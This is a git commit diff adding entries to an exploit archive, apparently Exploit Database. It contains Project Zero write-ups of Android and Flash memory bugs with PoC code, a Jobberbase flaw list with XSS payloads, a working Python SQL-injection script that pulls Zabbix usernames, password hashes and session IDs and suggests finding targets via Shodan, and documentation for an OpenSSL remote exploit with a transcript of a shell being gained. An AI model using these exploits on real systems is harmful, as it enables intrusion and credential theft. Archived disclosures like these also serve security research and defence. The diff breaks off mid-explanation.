Arbitrary File Upload / Filter Bypass / Remote Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution vBulletin 5.1.x - Pre-Authentication Remote Code Execution vBulletin 5.1.x - Unauthenticated Remote Code Execution WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass WordPress WP to Twitter Plugin - Authorization Bypass WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass WordPress WP to Twitter Plugin - Authentication Bypass Novell ServiceDesk - Authenticated File Upload Novell ServiceDesk - Authenticated Arbitrary File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass) Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass) phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers) vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit) phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution phpMyAdmin 4.6.2 - Authenticated Remote Code Execution vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass
This commit is contained in:
parent
2aa9d941de
commit
0be1ea959a
15 changed files with 1745 additions and 1776 deletions
160
platforms/android/remote/40354.txt
Executable file
160
platforms/android/remote/40354.txt
Executable file
|
@ -0,0 +1,160 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=840
|
||||
|
||||
There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8.
|
||||
|
||||
This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service "android.security.keystore" from a normal app context without any additional permissions. There are probably other routes to reach this code with attacker controlled data.
|
||||
|
||||
ssize_t utf16_to_utf8_length(const char16_t *src, size_t src_len)
|
||||
{
|
||||
if (src == NULL || src_len == 0) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
size_t ret = 0;
|
||||
const char16_t* const end = src + src_len;
|
||||
while (src < end) {
|
||||
if ((*src & 0xFC00) == 0xD800 && (src + 1) < end
|
||||
&& (*++src & 0xFC00) == 0xDC00) { // <---- increment src here even if condition is false
|
||||
// surrogate pairs are always 4 bytes.
|
||||
ret += 4;
|
||||
src++;
|
||||
} else {
|
||||
ret += utf32_codepoint_utf8_length((char32_t) *src++); // <---- increment src again
|
||||
}
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
|
||||
void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst)
|
||||
{
|
||||
if (src == NULL || src_len == 0 || dst == NULL) {
|
||||
return;
|
||||
}
|
||||
|
||||
const char16_t* cur_utf16 = src;
|
||||
const char16_t* const end_utf16 = src + src_len;
|
||||
char *cur = dst;
|
||||
while (cur_utf16 < end_utf16) {
|
||||
char32_t utf32;
|
||||
// surrogate pairs
|
||||
if((*cur_utf16 & 0xFC00) == 0xD800 && (cur_utf16 + 1) < end_utf16
|
||||
&& (*(cur_utf16 + 1) & 0xFC00) == 0xDC00) { // <---- no increment if condition is false
|
||||
utf32 = (*cur_utf16++ - 0xD800) << 10;
|
||||
utf32 |= *cur_utf16++ - 0xDC00;
|
||||
utf32 += 0x10000;
|
||||
} else {
|
||||
utf32 = (char32_t) *cur_utf16++; // <---- increment src
|
||||
}
|
||||
const size_t len = utf32_codepoint_utf8_length(utf32);
|
||||
utf32_codepoint_to_utf8((uint8_t*)cur, utf32, len);
|
||||
cur += len;
|
||||
}
|
||||
*cur = '\0';
|
||||
}
|
||||
|
||||
An example character sequence would be the following:
|
||||
|
||||
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
|
||||
|
||||
This will be processed by utf16_to_utf8_len like this:
|
||||
|
||||
first loop iteration:
|
||||
|
||||
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
|
||||
^
|
||||
invalid surrogate; skip at (*++src & 0xfc00 == 0xdc00)
|
||||
|
||||
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
|
||||
^
|
||||
invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
|
||||
|
||||
second loop iteration:
|
||||
|
||||
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
|
||||
^
|
||||
invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
|
||||
|
||||
And will be processed by utf16_to_utf8 like this:
|
||||
|
||||
first loop iteration:
|
||||
|
||||
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
|
||||
^
|
||||
invalid surrogate; write 0 length character to output
|
||||
|
||||
second loop iteration
|
||||
|
||||
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
|
||||
^
|
||||
valid surrogate pair 0xd841 0xdc41; emit length 4 character to output
|
||||
|
||||
We can then construct a crash PoC using this sequence for the String16 passed to the keystore method 'getKeyCharacteristics' that will perform the String8(String16&) constructor on attacker supplied input; and provide a massive input string. The crash PoC should write 0x20000 * 2/3 bytes into a 2 byte heap allocation. It has been tested on a recent nexus5x userdebug build; resulting in the following crash (the object backing an android::vectorImpl has been corrupted by the overwrite, and "\xf0\xa0\x91\x81" is the utf8 encoding for the utf16 "\x41\xd8 \x41\xdc"):
|
||||
|
||||
pid: 16669, tid: 16669, name: keystore >>> /system/bin/keystore <<<
|
||||
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x91a0f08191a110
|
||||
x0 8191a0f08191a108 x1 0000000000000000 x2 0000000000000000 x3 0000000000000020
|
||||
x4 00000000ffffffa0 x5 0000000000000010 x6 0000000000000001 x7 0000007f802c0018
|
||||
x8 0000000000000000 x9 000000000a7c5ac5 x10 0000000000000000 x11 0000000000000000
|
||||
x12 000000000000d841 x13 0000000000000841 x14 0000000000000041 x15 0000007f8067bd9e
|
||||
x16 0000005565984f08 x17 0000007f80aeee48 x18 00000000ffffff91 x19 0000007fd1de26c0
|
||||
x20 8191a0f08191a108 x21 8191a0f08191a0f0 x22 0000000000000000 x23 0000005565984000
|
||||
x24 8191a0f08191a0f0 x25 0000007fd1dea7b8 x26 0000007f806690e0 x27 0000007fd1de25d0
|
||||
x28 000000556596f000 x29 0000007fd1de2550 x30 0000005565961188
|
||||
sp 0000007fd1de2550 pc 0000007f80aeee58 pstate 0000000060000000
|
||||
|
||||
backtrace:
|
||||
#00 pc 0000000000016e58 /system/lib64/libutils.so (_ZN7android10VectorImpl13editArrayImplEv+16)
|
||||
#01 pc 000000000000a184 /system/bin/keystore
|
||||
#02 pc 00000000000112d0 /system/bin/keystore
|
||||
#03 pc 000000000000b7f4 /system/lib64/libkeystore_binder.so (_ZN7android17BnKeystoreService10onTransactEjRKNS_6ParcelEPS1_j+1560)
|
||||
#04 pc 0000000000024c9c /system/lib64/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+168)
|
||||
#05 pc 000000000002dd98 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+1240)
|
||||
#06 pc 000000000002de4c /system/lib64/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+140)
|
||||
#07 pc 000000000002def4 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+76)
|
||||
#08 pc 0000000000007a04 /system/bin/keystore (main+1940)
|
||||
#09 pc 000000000001bc98 /system/lib64/libc.so (__libc_init+100)
|
||||
#10 pc 0000000000007c20 /system/bin/keystore
|
||||
|
||||
######################################################
|
||||
|
||||
Actually you can compromise many native system services using this bug (ie those not implemented in Java); because of the interface token checking code in Parcel.cpp. See attached for another PoC that takes as a first command line argument the name of the service to crash. On my nexus 5x with very unscientific testing, this includes the following services:
|
||||
|
||||
- phone, iphonesubinfo, isub (com.android.phone)
|
||||
- telecom, voiceinteraction, backup, audio, location, notification, connectivity, wifi, network_management, statusbar, device_policy, mount, input_method, window, content, account, telephony.registry, user, package, batterystats (system_server)
|
||||
- media.audio_policy, media.audio_flinger (mediaserver)
|
||||
- drm.drmManager (drmserver)
|
||||
- android.security.keystore (keystore)
|
||||
- SurfaceFlinger (surfaceflinger)
|
||||
|
||||
bool Parcel::enforceInterface(const String16& interface,
|
||||
IPCThreadState* threadState) const
|
||||
{
|
||||
int32_t strictPolicy = readInt32();
|
||||
if (threadState == NULL) {
|
||||
threadState = IPCThreadState::self();
|
||||
}
|
||||
if ((threadState->getLastTransactionBinderFlags() &
|
||||
IBinder::FLAG_ONEWAY) != 0) {
|
||||
// For one-way calls, the callee is running entirely
|
||||
// disconnected from the caller, so disable StrictMode entirely.
|
||||
// Not only does disk/network usage not impact the caller, but
|
||||
// there's no way to commuicate back any violations anyway.
|
||||
threadState->setStrictModePolicy(0);
|
||||
} else {
|
||||
threadState->setStrictModePolicy(strictPolicy);
|
||||
}
|
||||
const String16 str(readString16());
|
||||
if (str == interface) {
|
||||
return true;
|
||||
} else {
|
||||
ALOGW("**** enforceInterface() expected '%s' but read '%s'",
|
||||
String8(interface).string(), String8(str).string());
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
Proofs of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip
|
||||
|
32
platforms/multiple/dos/40355.txt
Executable file
32
platforms/multiple/dos/40355.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
|
||||
|
||||
There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
|
||||
|
||||
A minimal PoC is as follows:
|
||||
|
||||
this.createEmptyMovieClip( "mc", 1);
|
||||
var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
|
||||
var t:Transform = new Transform( mc );
|
||||
t.colorTransform = c;
|
||||
this.createTextField( "tf", 2, 0, 0, 2000, 200);
|
||||
var ct = ColorTransform;
|
||||
var g = flash.geom;
|
||||
g.addProperty("ColorTransform", func, func);
|
||||
var q = t.colorTransform;
|
||||
tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
|
||||
|
||||
function func(){
|
||||
|
||||
mc.removeMovieClip();
|
||||
|
||||
return ct;
|
||||
|
||||
}
|
||||
|
||||
|
||||
A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip
|
||||
|
21
platforms/multiple/dos/40356.txt
Executable file
21
platforms/multiple/dos/40356.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
|
||||
|
||||
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
|
||||
|
||||
var mc = this.createEmptyMovieClip( "mc", 1);
|
||||
mc.addProperty( "f", func, func );
|
||||
mc.f("hello");
|
||||
|
||||
function func(){
|
||||
|
||||
mc.removeMovieClip();
|
||||
// Fix heap
|
||||
var d:Date = new Date();
|
||||
return d.getDate;
|
||||
|
||||
}
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip
|
||||
|
40
platforms/php/webapps/40351.txt
Executable file
40
platforms/php/webapps/40351.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
Jobberbase: http://www.jobberbase.com/
|
||||
Version: 2.0
|
||||
By Ross Marks: http://www.rossmarks.co.uk
|
||||
|
||||
1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
|
||||
eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
|
||||
returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>
|
||||
|
||||
2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there
|
||||
|
||||
3) reflect XSS in username - http://example.com/admin/
|
||||
eg. "><script>alert(1)</script>
|
||||
reflect XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/
|
||||
|
||||
4) persistant XSS on admin backend homepage
|
||||
create a job and give the URL:
|
||||
" onhover="alert(1)
|
||||
persistant XSS - admin add to category name (no protection)
|
||||
|
||||
5) unrestricted file upload
|
||||
upload CV accepts any filetype appends _ uniqueid() to filename
|
||||
eg. "file.php" becomes "file_<uniqueid>.php"
|
||||
uniquid in in insecure method for generating random sequences and is based on microtime
|
||||
if the server is using an older version of PHP a null byte can be used
|
||||
ie. "test.php%00.php" would be uploaded as "test.php"
|
||||
|
||||
6) code execution race condition:
|
||||
if the admin has chosen to not store uploaded CV's
|
||||
they are first moved from /tmp to the writable /upload directory before being unlinked
|
||||
this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted
|
||||
|
||||
7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
|
||||
days_behind parameter is vulnerable
|
||||
|
||||
** notes **
|
||||
|
||||
admin change password page don't need old password, no csrf token just a simple POST request.
|
||||
admin password stored in md5 format unsalted
|
||||
cookies do NOT have "secure" or "HTTPonly" flags enabled
|
||||
no csrf anywhere
|
56
platforms/php/webapps/40353.py
Executable file
56
platforms/php/webapps/40353.py
Executable file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
|
||||
# Data: 20-08-2016
|
||||
# Software Link: www.zabbix.com
|
||||
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
|
||||
# Version: Zabbix 2.0-3.0.x(<3.0.4)
|
||||
|
||||
# PoC Author: Zzzians
|
||||
# Contact: Zzzians@gmail.com
|
||||
# Test on: Linux (Debian/CentOS/Ubuntu)
|
||||
|
||||
# -*- coding: utf_8 -*-
|
||||
# Use Shodan or and enjoy :)
|
||||
# Comb the intranet for zabbix and enjoy :)
|
||||
import sys,os,re,urllib2
|
||||
def Inject(url,sql,reg):
|
||||
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
|
||||
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
|
||||
try:
|
||||
response = urllib2.urlopen(payload, timeout=20).read()
|
||||
except Exception, msg:
|
||||
print '\t\tOpps,an error occurs...',msg
|
||||
else:
|
||||
result_reg = re.compile(reg)
|
||||
results = result_reg.findall(response)
|
||||
print payload #Uncomment this to see details
|
||||
if results:
|
||||
return results[0]
|
||||
def exploit(url,userid):
|
||||
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
|
||||
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
|
||||
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
|
||||
if(password):
|
||||
print '[+]Username~Password : %s' % password
|
||||
else:
|
||||
print '[-]Get Password Failed'
|
||||
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
|
||||
if(session_id):
|
||||
print "[+]Session_id:%s" % session_id
|
||||
else:
|
||||
print "[-]Get Session id Failed"
|
||||
print '\n'
|
||||
|
||||
def main():
|
||||
print '=' * 70
|
||||
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
|
||||
print '\t\t Author:Zzzians(Zzzians@gmail.com)'
|
||||
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
|
||||
print '\t\t\t Time:2016-08-20\n'
|
||||
urls = ["http://10.15.5.86"]
|
||||
ids = [1,2]
|
||||
for url in urls:
|
||||
if url[-1] != '/': url += '/'
|
||||
print '='*25 + url + '='*25
|
||||
for userid in ids:
|
||||
exploit(url,userid)
|
||||
main()
|
|
@ -1,3 +1,4 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/5363/info
|
||||
|
||||
A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
|
||||
|
@ -5,6 +6,7 @@ A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
|
|||
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
|
||||
|
||||
***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available.
|
||||
*/
|
||||
|
||||
/*
|
||||
* VERY PRIV8 spabam SPAX@zone-h.org
|
||||
|
|
File diff suppressed because it is too large
Load diff
444
platforms/unix/remote/40347.txt
Executable file
444
platforms/unix/remote/40347.txt
Executable file
|
@ -0,0 +1,444 @@
|
|||
/*
|
||||
* openssl-too-open.c - OpenSSL remote exploit
|
||||
* Spawns a nobody/apache shell on Apache, root on other servers.
|
||||
*
|
||||
* by Solar Eclipse <solareclipse@phreedom.org>
|
||||
*
|
||||
* Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help.
|
||||
*
|
||||
* This code or any derivative versions of it may not be posted to Bugtraq
|
||||
* or anywhere on SecurityFocus, Symantec or any affiliated site.
|
||||
*
|
||||
*/
|
||||
|
||||
---------[ ./openssl-too-open ]
|
||||
|
||||
openssl-too-open is a remote exploit for the KEY_ARG overflow in
|
||||
OpenSSL 0.9.6d and older. It will give you a remote shell with the
|
||||
priviledges of the server process (nobody when used against Apache,
|
||||
root against other servers).
|
||||
|
||||
Only Linux/x86 targets are supported.
|
||||
|
||||
: openssl-too-open : OpenSSL remote exploit
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
Usage: ./openssl-too-open [options] <host>
|
||||
-a <arch> target architecture (default is 0x00)
|
||||
-p <port> SSL port (default is 443)
|
||||
-c <N> open N apache connections before sending the shellcode (default is 30)
|
||||
-m <N> maximum number of open connections (default is 50)
|
||||
-v verbose mode
|
||||
|
||||
Supported architectures:
|
||||
0x00 - Gentoo (apache-1.3.24-r2)
|
||||
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
|
||||
0x02 - Slackware 7.0 (apache-1.3.26)
|
||||
0x03 - Slackware 8.1-stable (apache-1.3.26)
|
||||
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
|
||||
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
|
||||
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
|
||||
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
|
||||
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
|
||||
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
|
||||
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
|
||||
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
|
||||
0x0c - SuSE Linux 7.0 (apache-1.3.12)
|
||||
0x0d - SuSE Linux 7.1 (apache-1.3.17)
|
||||
0x0e - SuSE Linux 7.2 (apache-1.3.19)
|
||||
0x0f - SuSE Linux 7.3 (apache-1.3.20)
|
||||
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
|
||||
0x11 - SuSE Linux 8.0 (apache-1.3.23)
|
||||
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
|
||||
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
|
||||
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
|
||||
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
|
||||
|
||||
Examples: ./openssl-too-open -a 0x01 -v localhost
|
||||
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80
|
||||
|
||||
|
||||
---------[ ./openssl-scanner ]
|
||||
|
||||
openssl-scanner scans a number of hosts for vulnerable OpenSSL
|
||||
implementations.
|
||||
|
||||
: openssl-scanner : OpenSSL vulnerability scanner
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
Usage: ./openssl-scanner [options] <host>
|
||||
-i <inputfile> file with target hosts
|
||||
-o <outputfile> output log
|
||||
-a append to output log (requires -o)
|
||||
-b check for big endian servers
|
||||
-C scan the entire class C network the host belogs to
|
||||
-d debug mode
|
||||
-w N connection timeout in seconds
|
||||
|
||||
Examples: ./openssl-scanner -d 192.168.0.1
|
||||
./openssl-scanner -i hosts -o my.log -w 5
|
||||
|
||||
|
||||
---------[ Screenshots ]
|
||||
|
||||
$ ./openssl-scanner -C 192.168.0.0
|
||||
: openssl-scanner : OpenSSL vulnerability scanner
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
Opening 255 connections . . . . . . . . . . done
|
||||
Waiting for all connections to finish . . . . . . . . . . . done
|
||||
|
||||
192.168.0.136: Vulnerable
|
||||
|
||||
|
||||
$ nc 192.168.0.1 80
|
||||
HEAD / HTTP/1.0
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Tue, 17 Sep 2002 17:47:44 GMT
|
||||
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
|
||||
./openssl-too-open -a 0x14 192.168.0.1
|
||||
: openssl-too-open : OpenSSL remote exploit
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
: Opening 30 connections
|
||||
Establishing SSL connections
|
||||
|
||||
: Using the OpenSSL info leak to retrieve the addresses
|
||||
ssl0 : 0x810b3a0
|
||||
ssl1 : 0x810b360
|
||||
ssl2 : 0x810b4e0
|
||||
|
||||
* Addresses don't match.
|
||||
|
||||
: Opening 40 connections
|
||||
Establishing SSL connections
|
||||
|
||||
: Using the OpenSSL info leak to retrieve the addresses
|
||||
ssl0 : 0x8103830
|
||||
ssl1 : 0x80fd668
|
||||
ssl2 : 0x80fd668
|
||||
|
||||
* Addresses don't match.
|
||||
|
||||
: Opening 50 connections
|
||||
Establishing SSL connections
|
||||
|
||||
: Using the OpenSSL info leak to retrieve the addresses
|
||||
ssl0 : 0x8103830
|
||||
ssl1 : 0x8103830
|
||||
ssl2 : 0x8103830
|
||||
|
||||
: Sending shellcode
|
||||
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
|
||||
Reading tag
|
||||
Execution of stage1 shellcode succeeded, sending stage2
|
||||
Spawning shell...
|
||||
|
||||
bash: no job control in this shell
|
||||
bash-2.05$
|
||||
bash-2.05$ uname -a; id; w;
|
||||
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
|
||||
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
||||
bash-2.05$
|
||||
|
||||
|
||||
---------[ How Does openssl-too-open Work? ]
|
||||
|
||||
It is important to understand the SSL2 handshake in order to successfully
|
||||
exploit the KEY_ARG vulnerability.
|
||||
|
||||
---/ Typical SSL2 Handshake
|
||||
|
||||
|
||||
Client Server
|
||||
|
||||
CLIENT_HELLO -->
|
||||
|
||||
<-- SERVER_HELLO
|
||||
|
||||
CLIENT_MASTER_KEY -->
|
||||
|
||||
<-- SERVER_VERIFY
|
||||
|
||||
CLIENT_FINISHED -->
|
||||
|
||||
<-- SERVER_FINISHED
|
||||
|
||||
The CLIENT_HELLO message contains a list of the ciphers the client supports,
|
||||
a session id and some challenge data. The session id is used if the client
|
||||
wishes to reuse an already established session, otherwise it's empty.
|
||||
|
||||
The server replies with a SERVER_HELLO message, also listing all supported
|
||||
ciphers and includes a certificate with its public RSA key. The server
|
||||
also sends a connection id, which will later be used by the client to
|
||||
verify that the encryption works.
|
||||
|
||||
The client generates a random master key, encrypts it with the server's
|
||||
public key and sends it with a CLIENT_MASTER_KEY message. This message
|
||||
also specifies the cipher selected by the client and a KEY_ARG field,
|
||||
which meaning depends on the specified cipher. For DES-CBC ciphers, the
|
||||
KEY_ARG contains the initialization vector.
|
||||
|
||||
Now both the client and the server have the master key and they can generate
|
||||
the session keys from it. All messages from this point on are encrypted.
|
||||
|
||||
The server replies with a SERVER_VERIFY message, containing the challenge
|
||||
data from the CLIENT_HELLO message. If the key exchange has been successful,
|
||||
the client will be able to decrypt this message and the challenge data returned
|
||||
from the server will match the challenge data sent by the client.
|
||||
|
||||
The client sends a CLIENT_FINISHED message with a copy of the connection id
|
||||
from the SERVER_HELLO packet. It is now the server's turn to decrypt this
|
||||
message and check if the connection id returned by the client matches the
|
||||
connection it sent by the server.
|
||||
|
||||
Finally the server sends a SERVER_FINISHED message, completing the handshake.
|
||||
This message contains a session id, generated by the server. If the client
|
||||
wishes to reuse the session later, it can send this session id with the
|
||||
CLIENT_HELLO message.
|
||||
|
||||
|
||||
---/ The KEY_ARG Buffer Overflow
|
||||
|
||||
The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This
|
||||
function reads a CLIENT_MASTER_KEY packet and processes it. It reads the
|
||||
KEY_ARG_LENGTH value from the client and then copies that many bytes in an
|
||||
array of a fixed size. This array is part of the SSL_SESSION structure.
|
||||
If the client specifies a KEY_ARG longer than 8 bytes, the variables in the
|
||||
SSL_SESSION structure can be overwritten with user supplied data.
|
||||
|
||||
Let's look at the definition of this structure.
|
||||
|
||||
typedef struct ssl_session_st
|
||||
{
|
||||
int ssl_version; /* what ssl version session info is
|
||||
* being kept in here? */
|
||||
|
||||
/* only really used in SSLv2 */
|
||||
unsigned int key_arg_length;
|
||||
unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
|
||||
int master_key_length;
|
||||
unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
|
||||
/* session_id - valid? */
|
||||
unsigned int session_id_length;
|
||||
unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
|
||||
/* this is used to determine whether the session is being reused in
|
||||
* the appropriate context. It is up to the application to set this,
|
||||
* via SSL_new */
|
||||
unsigned int sid_ctx_length;
|
||||
unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
|
||||
|
||||
int not_resumable;
|
||||
|
||||
/* The cert is the certificate used to establish this connection */
|
||||
struct sess_cert_st /* SESS_CERT */ *sess_cert;
|
||||
|
||||
/* This is the cert for the other end.
|
||||
* On clients, it will be the same as sess_cert->peer_key->x509
|
||||
* (the latter is not enough as sess_cert is not retained
|
||||
* in the external representation of sessions, see ssl_asn1.c). */
|
||||
X509 *peer;
|
||||
/* when app_verify_callback accepts a session where the peer's certificate
|
||||
* is not ok, we must remember the error for session reuse: */
|
||||
long verify_result; /* only for servers */
|
||||
|
||||
int references;
|
||||
long timeout;
|
||||
long time;
|
||||
|
||||
int compress_meth; /* Need to lookup the method */
|
||||
|
||||
SSL_CIPHER *cipher;
|
||||
unsigned long cipher_id; /* when ASN.1 loaded, this
|
||||
* needs to be used to load
|
||||
* the 'cipher' structure */
|
||||
|
||||
STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
|
||||
|
||||
CRYPTO_EX_DATA ex_data; /* application specific data */
|
||||
|
||||
/* These are used to make removal of session-ids more
|
||||
* efficient and to implement a maximum cache size. */
|
||||
struct ssl_session_st *prev,*next;
|
||||
} SSL_SESSION;
|
||||
|
||||
It really looks better with VIM coloring. Anyway, we know the size of the
|
||||
structure and it's allocated on the heap. The first thing that comes to
|
||||
